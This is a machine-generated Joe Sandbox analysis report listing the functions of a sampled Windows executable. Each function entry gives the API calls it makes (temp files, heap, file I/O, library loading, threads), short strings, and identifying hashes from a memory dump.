.pA, xrefs: 00401085
:pA, xrefs: 0040112D

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonConsoleControlsCtrlDestroyEnumHandlerInitLoadModuleResourceTypes
String ID: .pA$:pA$|pA
API String ID: 1974305647-3272395972
Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F

Function 0040196C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

Strings

$pA, xrefs: 00401AD9
$pA, xrefs: 00401B3D
$pA, xrefs: 00401A31
$pA, xrefs: 00401A84

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: $pA$$pA$$pA$$pA
API String ID: 368575804-1531182785
Opcode ID: 417cfe909ad584d3d84b117594ea6d6ab06f79ec2e3b7b64df38e28ad1b69bb8
Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
Opcode Fuzzy Hash: 417cfe909ad584d3d84b117594ea6d6ab06f79ec2e3b7b64df38e28ad1b69bb8
Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E

Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02130000,00000000,?,?), ref: 0040E967

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E

Strings

Kernel32.DLL, xrefs: 0040ADF3
GetLongPathNameW, xrefs: 0040AE06

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
Opcode Fuzzy Hash: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD

Function 0040B140 Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D

Function 0040DE99 Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76ED5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99

Function 00403F53 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02139760,00000000,00000000), ref: 0040445B
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554

Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(02139760,02139760,00002710), ref: 00402BE0

Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(02139760,02139760,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,02139760,02138968,00000000,00000000), ref: 00401E9B

SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,02139760,02138968,00000000,00000000,00000000), ref: 00404636

Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02139760), ref: 004054A5
Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D

Strings

pA, xrefs: 00404275

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
String ID: pA
API String ID: 2577741277-3402996844
Opcode ID: 5d668cb04b71de2f480a77bc2cc63b906295f5a7c4242ac04163e6f1321037e2
Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
Opcode Fuzzy Hash: 5d668cb04b71de2f480a77bc2cc63b906295f5a7c4242ac04163e6f1321037e2
Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A

Function 00403C83 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

PathQuoteSpacesW.SHLWAPI(00000000,00000000,021389E0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,021389E0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F

Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B

Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(02139760,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,02139760,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921

Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3

Strings

*pA, xrefs: 00403CFD
*pA, xrefs: 00403D5D

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
String ID: *pA$*pA
API String ID: 2955313036-2893952571
Opcode ID: 8d7ca3d34e552a4b3e4813a4e2a868de4bbf3c1973305ed030a1fd90886de301
Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
Opcode Fuzzy Hash: 8d7ca3d34e552a4b3e4813a4e2a868de4bbf3c1973305ed030a1fd90886de301
Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A

Function 00401BA0 Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: daa4a2f45eb59f3489035f7ac704f19fa2d9e105317b1c650053be6a57c9566a
Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
Opcode Fuzzy Hash: daa4a2f45eb59f3489035f7ac704f19fa2d9e105317b1c650053be6a57c9566a
Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E

Function 0040B6A0 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B712

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA

Function 0040E560 Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599
RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94

Function 0040AD45 Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 0040AD63
wcslen.MSVCRT ref: 0040AD75
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A

Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00408DFB
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
CoInitialize.OLE32(00000000), ref: 00408E1D

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95

Function 004099A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(02139760,02139760,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Strings

$0A, xrefs: 004099B4

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
